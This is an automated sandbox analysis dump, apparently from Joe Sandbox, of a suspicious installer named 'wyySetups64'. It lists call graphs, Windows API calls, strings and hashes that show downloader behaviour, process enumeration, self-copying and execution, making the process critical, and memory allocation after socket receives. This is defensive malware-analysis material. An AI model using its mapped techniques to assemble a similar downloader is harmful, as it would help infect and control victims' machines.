10743->10741 10747 d51f27 10744->10747 10746 d54887 SetFileAttributesA 10746->10729 10748 d51f36 Concurrency::task_continuation_context::task_continuation_context 10747->10748 10748->10746 10810 100024cb 10811 100024d3 Concurrency::task_continuation_context::task_continuation_context 10810->10811 10813 100024da _Error_objects Concurrency::task_continuation_context::task_continuation_context 10811->10813 10814 10002ae0 memmove 10811->10814 10814->10813 11524 1000b350 ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11525 1000b36b ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@ ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11524->11525 11530 1000b3ef Concurrency::task_continuation_context::task_continuation_context 11524->11530 11526 1000b383 Concurrency::task_continuation_context::task_continuation_context 11525->11526 11525->11530 11528 1000b3d0 ?_Gndec@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11526->11528 11529 1000b39c ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11526->11529 11527 1000b3e2 Concurrency::task_continuation_context::task_continuation_context 11528->11527 11533 1000b3bd 11529->11533 11530->11527 11531 1000b459 ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11530->11531 11537 10003ef0 ungetc 11530->11537 11531->11527 11532 1000b46c 11531->11532 11539 1000c0c0 ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11532->11539 11533->11528 11533->11530 11538 10003f0d 11537->11538 11538->11527 11538->11531 11540 1000c0f8 ?setg@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXPAD00 11539->11540 11541 1000c0da ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@ ?egptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11539->11541 11540->11527 11541->11540 10749 10011c50 10750 10011c6c 10749->10750 10751 10011c5c ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE 10749->10751 10751->10750 11488 d60e07 ___scrt_dllmain_exception_filter 10752 d51087 10753 d51099 10752->10753 10755 d510a7 10752->10755 10754 d51125 
NtdllDefWindowProc_W 10753->10754 10753->10755 10754->10755 10815 d50006 10818 d50032 10815->10818 10819 d50ae4 GetPEB 10818->10819 10820 d5029b 10819->10820 10821 d50ae4 GetPEB 10820->10821 10825 d502a7 10821->10825 10822 d5002d 10823 d504a6 GetNativeSystemInfo 10823->10822 10824 d504d3 VirtualAlloc 10823->10824 10826 d504ec 10824->10826 10825->10822 10825->10823 10826->10822 10827 10010610 118 API calls 10826->10827 10827->10822 10828 d50000 10830 d50005 10828->10830 10831 d50006 10830->10831 10832 d50032 121 API calls 10831->10832 10833 d5002d 10832->10833 11290 d60280 11295 d60231 11290->11295 11291 d60200 recv 11293 d60278 11291->11293 11291->11295 11292 d602bf VirtualAlloc 11294 d602a2 11292->11294 11296 d60282 closesocket WSACleanup 11293->11296 11297 d6027e 11293->11297 11295->11291 11295->11292 11296->11294 11297->11292 11235 d6090d 11236 d60922 11235->11236 11239 d60ee7 IsProcessorFeaturePresent 11236->11239 11238 d6092e ___scrt_uninitialize_crt 11240 d60f0b 11239->11240 11240->11238 11542 10010b5d 11543 10010b68 11542->11543 11544 10010b9b 11542->11544 11547 10010b6d 11543->11547 11548 10010bb0 11543->11548 11545 10010cb7 __DllMainCRTStartup@12 15 API calls 11544->11545 11545->11547 11549 10010bbc ___scrt_is_nonwritable_in_current_image 11548->11549 11566 10010942 11549->11566 11551 10010bc3 __DllMainCRTStartup@12 11552 10010bea 11551->11552 11553 10010caf 11551->11553 11557 10010c4a ___scrt_is_nonwritable_in_current_image 11551->11557 11570 100108a4 11552->11570 11554 1001124d __DllMainCRTStartup@12 6 API calls 11553->11554 11556 10010cb6 11554->11556 11557->11547 11558 10010bf9 __RTC_Initialize 11558->11557 11573 100114a3 InitializeSListHead 11558->11573 11560 10010c07 11561 10010c0c _initterm_e 11560->11561 11561->11557 11562 10010c21 11561->11562 11574 10010879 11562->11574 11564 10010c26 11564->11557 11565 10010c2a _initterm 11564->11565 11565->11557 11567 1001094b 11566->11567 11583 10010f10 IsProcessorFeaturePresent 11567->11583 11569 10010957 
___scrt_uninitialize_crt 11569->11551 11585 1001097b 11570->11585 11572 100108ab 11572->11558 11573->11560 11575 1001087e ___scrt_release_startup_lock 11574->11575 11576 10010882 11575->11576 11577 10010889 11575->11577 11578 10010f10 IsProcessorFeaturePresent 11576->11578 11580 1001088e _configure_narrow_argv 11577->11580 11579 10010887 11578->11579 11579->11564 11581 10010899 11580->11581 11582 1001089c _initialize_narrow_environment 11580->11582 11581->11564 11582->11579 11584 10010f34 11583->11584 11584->11569 11586 10010987 11585->11586 11587 1001098b 11585->11587 11586->11572 11588 100109fa 11587->11588 11589 10010998 ___scrt_release_startup_lock 11587->11589 11590 1001124d __DllMainCRTStartup@12 6 API calls 11588->11590 11592 100109a5 _initialize_onexit_table 11589->11592 11593 100109c3 11589->11593 11591 10010a01 11590->11591 11592->11593 11594 100109b4 _initialize_onexit_table 11592->11594 11593->11572 11594->11593 10834 100108de 10835 100108e6 ___scrt_release_startup_lock 10834->10835 10836 10010903 _seh_filter_dll 10835->10836 9165 10001a60 9166 10001a81 6 API calls 9165->9166 9167 10001a72 9165->9167 9174 10001f50 9166->9174 9168 10001b52 PostQuitMessage 9167->9168 9169 10001a7c DefWindowProcW 9167->9169 9173 10001b75 9168->9173 9169->9173 9172 10001b32 CreateThread 9172->9173 9176 10001b80 9172->9176 9175 10001f5f Concurrency::task_continuation_context::task_continuation_context 9174->9175 9175->9172 9179 10001bb0 9176->9179 9178 10001ba3 9194 10011760 9179->9194 9182 10001c51 InternetReadFile 9184 10001c73 9182->9184 9185 10001d27 fclose InternetCloseHandle InternetCloseHandle GetParent ShowWindow 9182->9185 9183 10001c3a SendMessageW 9183->9182 9184->9182 9184->9185 9186 10001c7d fwrite 9184->9186 9191 10001d11 SendMessageW 9184->9191 9196 10001750 9185->9196 9186->9184 9188 10001d6b 9189 10001750 17 API calls 9188->9189 9190 10001d7b 9189->9190 9210 1000f330 9190->9210 9191->9184 9195 10001bbd InternetOpenA InternetOpenUrlA fopen HttpQueryInfoW 
9194->9195 9195->9182 9195->9183 9197 10001772 9196->9197 9200 100017a9 _Error_objects 9196->9200 9249 10010771 AcquireSRWLockExclusive 9197->9249 9199 1000177c _Error_objects 9199->9200 9254 10010b09 9199->9254 9238 10002e30 9200->9238 9204 100017f9 9242 10001de0 9204->9242 9207 1000180a 9246 10001dc0 9207->9246 9209 10001812 9209->9188 9211 1000f352 9210->9211 9328 1000f590 9211->9328 9218 1000f3b1 9343 1000ef30 9218->9343 9219 1000f240 NdrClientCall2 9219->9218 9225 1000f42e Sleep 9227 1000f080 5 API calls 9225->9227 9226 10001d8e exit 9226->9178 9228 1000f40a 9227->9228 9228->9225 9228->9226 9229 1000f457 9228->9229 9362 1000f210 9229->9362 9231 1000f47f Sleep 9365 1000f5b0 9231->9365 9234 10001dc0 2 API calls 9235 1000f464 9234->9235 9235->9226 9235->9231 9235->9234 9236 1000f4c4 9235->9236 9369 1000f260 CreateToolhelp32Snapshot 9235->9369 9380 1000f240 9236->9380 9240 10002e65 HandleT 9238->9240 9239 10002ea2 _Error_objects 9239->9204 9240->9239 9258 100038b0 9240->9258 9243 10001df2 HandleT Concurrency::task_continuation_context::task_continuation_context 9242->9243 9244 100023a0 2 API calls 9243->9244 9245 10001dfa 9243->9245 9244->9245 9245->9207 9247 100023a0 2 API calls 9246->9247 9248 10001dcf 9247->9248 9248->9209 9250 10010785 9249->9250 9251 1001078a ReleaseSRWLockExclusive 9250->9251 9323 100107c0 SleepConditionVariableSRW 9250->9323 9251->9199 9324 10010adb 9254->9324 9257 10010720 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 9257->9200 9259 100038dc Concurrency::task_continuation_context::task_continuation_context 9258->9259 9261 1000391c 9259->9261 9266 100015e0 ?_Xlength_error@std@@YAXPBD 9259->9266 9263 1000393f Concurrency::task_continuation_context::task_continuation_context 9261->9263 9267 100039e0 9261->9267 9270 10003b00 9263->9270 9266->9261 9274 10003b90 9267->9274 9271 100039c1 9270->9271 9272 10003b0f 9270->9272 9271->9239 9307 100023a0 9272->9307 9277 10003bd0 9274->9277 9282 10003c70 9277->9282 9283 
10003c8a 9282->9283 9285 10003be0 9282->9285 9293 10001490 9283->9293 9286 10003c30 9285->9286 9287 10003c3d 9286->9287 9290 10003a05 9286->9290 9288 10003c54 9287->9288 9289 10003c46 9287->9289 9304 10001520 9288->9304 9296 10003cb0 9289->9296 9290->9263 9294 10001410 stdext::threads::lock_error::lock_error 9293->9294 9295 1000149e _CxxThrowException 9294->9295 9295->9285 9297 10003cc7 9296->9297 9298 10003ccc 9296->9298 9299 10001490 allocator _CxxThrowException 9297->9299 9300 10001520 allocator _callnewh malloc _CxxThrowException _CxxThrowException 9298->9300 9299->9298 9301 10003cd6 9300->9301 9302 10003ce4 _invalid_parameter_noinfo_noreturn 9301->9302 9303 10003cf3 9301->9303 9302->9301 9302->9302 9303->9290 9305 100107d5 allocator _callnewh malloc _CxxThrowException _CxxThrowException 9304->9305 9306 1000152c 9305->9306 9306->9290 9308 100023b7 Concurrency::task_continuation_context::task_continuation_context 9307->9308 9310 100023e8 _Error_objects 9308->9310 9311 10002b30 9308->9311 9310->9271 9314 10002dc0 9311->9314 9317 10003550 9314->9317 9318 10003571 9317->9318 9321 1000357e 9317->9321 9319 10001540 allocator _invalid_parameter_noinfo_noreturn 9318->9319 9319->9321 9320 10010b1e _MallocaArrayHolder free 9322 10002b5b 9320->9322 9321->9320 9322->9310 9323->9250 9325 10010af1 _register_onexit_function 9324->9325 9326 10010aea _crt_atexit 9324->9326 9327 1000179c 9325->9327 9326->9327 9327->9257 9383 1000f8a0 9328->9383 9331 1000ee80 RpcStringBindingComposeW 9332 1000eed1 RpcBindingFromStringBindingW RpcBindingSetAuthInfoExA RpcStringFreeW 9331->9332 9333 1000eecd 9331->9333 9332->9333 9334 1000f080 9333->9334 9337 1000f0a9 9334->9337 9336 1000f0e3 9336->9218 9336->9219 9337->9336 9338 1000f1e1 CoTaskMemFree 9337->9338 9339 1000f1ce CoTaskMemFree 9337->9339 9340 1000f171 9337->9340 9409 1000ff70 NdrClientCall2 9337->9409 9338->9336 9338->9337 9339->9337 9341 1000f18b CoTaskMemFree 9340->9341 9342 1000f19e CoTaskMemFree 9340->9342 9341->9340 9342->9336 
APIs
• GetNativeSystemInfo.KERNEL32(?), ref: 00D504AE
• VirtualAlloc.KERNEL32(?,?,00003000,00000004), ref: 00D504DE
Strings
Memory Dump Source
• Source File: 00000000.00000002.1816336980.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_wyySetups64.jbxd
Similarity
• API ID: AllocInfoNativeSystemVirtual
• String ID: A$A$Cach$F$Fu$G$Li$Lo$P$Rt$S$Syst$Ta$Vi$Via$a$a$a$a$b$b$ctio$ee$fo$iv$mI$o$oc$otec$p$st$t$tNat$tu$tu$ucti$ushI$yA
• API String ID: 2032221330-2899676511
• Opcode ID: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
• Instruction ID: 6601f719d48952b094e19204eb64ec801f5cd8b10b545eaf248174b32aa51810
• Opcode Fuzzy Hash: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
• Instruction Fuzzy Hash: 3C627B325083858FDB21CF24C840BABBBE4FF94705F18492DEDC99B251E7709948CBA6

Control-flow Graph

APIs
• InternetOpenA.WININET(URLDownloader,00000001,00000000,00000000,00000000), ref: 10001BCA
• InternetOpenUrlA.WININET(?,?,00000000,00000000,80000000,00000000), ref: 10001BE6
• fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,10012458,?,10001BA3,?,?,?), ref: 10001BF8
• HttpQueryInfoW.WININET(?,20000005,00000000,00000004,00000000), ref: 10001C2D
• SendMessageW.USER32(?,00000401,00000000,00640000), ref: 10001C4A
• InternetReadFile.WININET(?,?,00001000,?), ref: 10001C65
• fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 10001C8E
• SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 10001D1B
• fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 10001D2B
• InternetCloseHandle.WININET(?), ref: 10001D38
• InternetCloseHandle.WININET(?), ref: 10001D42
• GetParent.USER32(?), ref: 10001D4C
• ShowWindow.USER32(?,00000000), ref: 10001D5B
• exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 10001D93
Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Internet$CloseHandleMessageOpenSend$FileHttpInfoParentQueryReadShowWindowexitfclosefopenfwrite
                                                                                                                                                                                                              • String ID: URLDownloader
                                                                                                                                                                                                              • API String ID: 3413257080-1891997712

Control-flow Graph

APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1000F26D
• Process32FirstW.KERNEL32(000000FF,0000022C), ref: 1000F298
• ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(1000D110), ref: 1000F2C1
• CloseHandle.KERNEL32(000000FF), ref: 1000F2CB
Strings
• Failed to retrieve first process., xrefs: 1000F2A2
Memory Dump Source
• Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
Similarity
• API ID: V01@$??6?$basic_ostream@CloseCreateD@std@@@std@@FirstHandleProcess32SnapshotToolhelp32U?$char_traits@V01@@
• String ID: Failed to retrieve first process.
• API String ID: 592929778-1967016982

Control-flow Graph

APIs
• RpcStringBindingComposeW.RPCRT4(00000000,100124B8,localhost,100124CC,00000000,10001D8E), ref: 1000EEBE
• RpcBindingFromStringBindingW.RPCRT4(10001D8E,00000000), ref: 1000EED9
• RpcBindingSetAuthInfoExA.RPCRT4(00000000,00000000,00000006,0000000A,00000000,00000000,00000001), ref: 1000EF10
• RpcStringFreeW.RPCRT4(10001D8E), ref: 1000EF1A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
Similarity
• API ID: Binding$String$AuthComposeFreeFromInfo
• String ID: localhost
• API String ID: 1126441048-2663516195

Control-flow Graph

APIs
• InitCommonControlsEx.COMCTL32(00000008), ref: 10001A93
• GetModuleHandleA.KERNEL32(00000000,00000000), ref: 10001A9D
• CreateWindowExW.USER32(00000000,msctls_progress32,00000000,50800001,00000014,0000001E,00000159,00000014,00000001,00000065,00000000), ref: 10001AC3
• SetWindowTheme.UXTHEME(00010420,10012444,10012440), ref: 10001ADE
• SendMessageW.USER32(00010420,00000409,00000000,00D77800), ref: 10001AF7
• malloc.API-MS-WIN-CRT-HEAP-L1-1-0(0000000C), ref: 10001B08
• CreateThread.KERNEL32(00000000,00000000,Function_00001B80,?,00000000,00000000), ref: 10001B49
• PostQuitMessage.USER32(00000000), ref: 10001B54
• DefWindowProcW.USER32(00000002,?,?,?), ref: 10001B6D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
Similarity
• API ID: Window$CreateMessage$CommonControlsHandleInitModulePostProcQuitSendThemeThreadmalloc
• String ID: $msctls_progress32
• API String ID: 1181878002-3669180086

Control-flow Graph

APIs
• GetModuleHandleA.KERNEL32(00000000), ref: 10001852
  • Part of subcall function 10001600: SHGetKnownFolderPath.SHELL32(10012340,00000000,00000000,00000000), ref: 1000165B
  • Part of subcall function 10001600: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,00000104), ref: 1000167A
  • Part of subcall function 10001600: CoTaskMemFree.OLE32(00000000,00000000,?), ref: 100016AE
• RegisterClassW.USER32(?), ref: 100019AD
• CreateWindowExW.USER32(00000000,?,00000000,00000000,?,?,?,?,?,?,10011876), ref: 100019E8
• ShowWindow.USER32(?,00000001,?,?,?,?,?,?,10011876), ref: 100019F7
• KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 10001A1E
• TranslateMessage.USER32(?), ref: 10001A2C
• DispatchMessageW.USER32(?), ref: 10001A36
Strings
Memory Dump Source
• Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
Similarity
• API ID: MessageWindow$CallbackClassCreateDispatchDispatcherFolderFreeHandleKnownModulePathRegisterShowTaskTranslateUserwcstombs
• String ID: URLDownloader
• API String ID: 919245287-1891997712
                                                                                                                                                                                                              • Opcode ID: d7e5858510ef4e4d2c6ac9c6255a0426f83fb6908b9dccf1c9d93bd52c33f40c
                                                                                                                                                                                                              • Instruction ID: 02b1e0a1a7493eeed2e2321454f16a2ce6d8cc5e573885ca1cf39a898ac010b9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d7e5858510ef4e4d2c6ac9c6255a0426f83fb6908b9dccf1c9d93bd52c33f40c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 215107B5D00318AFEB54CFA4CC45BDEBBB5FB48340F108169E119A7295EB746A44CF61

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 1001061D
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000), ref: 10010624
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,100048C0,00000000,00000000,00000000), ref: 10010639
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,100100C0,00000000,00000000,00000000), ref: 1001064E
                                                                                                                                                                                                                • Part of subcall function 10001170: LoadLibraryW.KERNEL32(ntdll.dll), ref: 1000117B
                                                                                                                                                                                                                • Part of subcall function 10001170: GetProcAddress.KERNEL32(?,RtlAdjustPrivilege), ref: 1000118D
                                                                                                                                                                                                                • Part of subcall function 10001170: GetProcAddress.KERNEL32(?,RtlSetProcessIsCritical), ref: 100011A1
                                                                                                                                                                                                                • Part of subcall function 10001170: GetModuleHandleA.KERNEL32(00000000), ref: 100011FD
                                                                                                                                                                                                                • Part of subcall function 10001170: RegisterClassW.USER32(?), ref: 10001211
                                                                                                                                                                                                                • Part of subcall function 10001170: CreateWindowExW.USER32(00000000,ndowClass,indow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 10001236
                                                                                                                                                                                                              • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 1001065B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateThread$AddressProc$ClassCurrentHandleLibraryLoadModuleObjectRegisterSingleWaitWindowexit
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1070008423-0
                                                                                                                                                                                                              • Opcode ID: 8fe67e59d9fa8f08b192819371fb0ced37870faed25ae35d93da0e6e918bcc92
                                                                                                                                                                                                              • Instruction ID: b32196050963cedc899c835c863bf3fa77a81109efd19031f53f5ae39edb479e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8fe67e59d9fa8f08b192819371fb0ced37870faed25ae35d93da0e6e918bcc92
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 71E026B53C4354BBF265A7E05C8BF4936549B09F42F608650F309BD0E2CAF4B450C62D

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 1000EE80: RpcStringBindingComposeW.RPCRT4(00000000,100124B8,localhost,100124CC,00000000,10001D8E), ref: 1000EEBE
                                                                                                                                                                                                              • _swprintf.LIBCMTD ref: 1000F3DC
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 1000F433
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 1000F484
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Sleep$BindingComposeString_swprintf
                                                                                                                                                                                                              • String ID: 5555555555
                                                                                                                                                                                                              • API String ID: 4095827290-304217070
                                                                                                                                                                                                              • Opcode ID: 1386329a5efce874629472e3114aa71895a9db344373e3eebb5de5ce6721f17b
                                                                                                                                                                                                              • Instruction ID: fc69ec1e48ae5d690075e784bcaa941b9f802e524bc258fcaffae97851e079c3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1386329a5efce874629472e3114aa71895a9db344373e3eebb5de5ce6721f17b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B516DB5D00208ABEB14DFD4DC41BEFB7B8EB48340F108118FA05BB686D734AA44DBA1

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 10010380: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 100103B3
                                                                                                                                                                                                                • Part of subcall function 10010330: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1001034E
                                                                                                                                                                                                              • CopyFileA.KERNEL32(00000000,?,00000000), ref: 100105A6
                                                                                                                                                                                                              • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 100105CC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$ModuleName$CopyExecuteShell
                                                                                                                                                                                                              • String ID: %s\%s$open
                                                                                                                                                                                                              • API String ID: 689381381-538903891
                                                                                                                                                                                                              • Opcode ID: 830c5ba8e21fc8d3b44d54b6d08c68639795a16e1df432a09aa5f5a78e158d4f
                                                                                                                                                                                                              • Instruction ID: 9fe97893565a199cb231c8e39f665fc81eb16fc602bb536f2ce1346a8447d072
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 830c5ba8e21fc8d3b44d54b6d08c68639795a16e1df432a09aa5f5a78e158d4f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: ED5190B4D04248ABEB14CFA0C891BEEBBB5EF05344F508198F5557B282DB75AB88CB51

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 1000FF70: NdrClientCall2.RPCRT4 ref: 1000FF8F
                                                                                                                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 1000F195
                                                                                                                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 1000F1A2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FreeTask$Call2Client
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3085621743-0
                                                                                                                                                                                                              • Opcode ID: 2f53cd99de7b70502dbfb43a252906e75cd8ef5dbbaed62b935777ebfb7fcb6a
                                                                                                                                                                                                              • Instruction ID: 92fa5dec9f22b8c7c1328a1cbf0c23ece76f2aec65bf6276d958f50508a6dbd7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2f53cd99de7b70502dbfb43a252906e75cd8ef5dbbaed62b935777ebfb7fcb6a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EB51F5B4E04209EBEF04CF94C894AEEB7B1FF48344F20815DE815A7748D735AA85EB91

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SHGetKnownFolderPath.SHELL32(10012340,00000000,00000000,00000000), ref: 1000165B
                                                                                                                                                                                                              • wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,00000104), ref: 1000167A
                                                                                                                                                                                                              • CoTaskMemFree.OLE32(00000000,00000000,?), ref: 100016AE
                                                                                                                                                                                                              Memory Dump Source
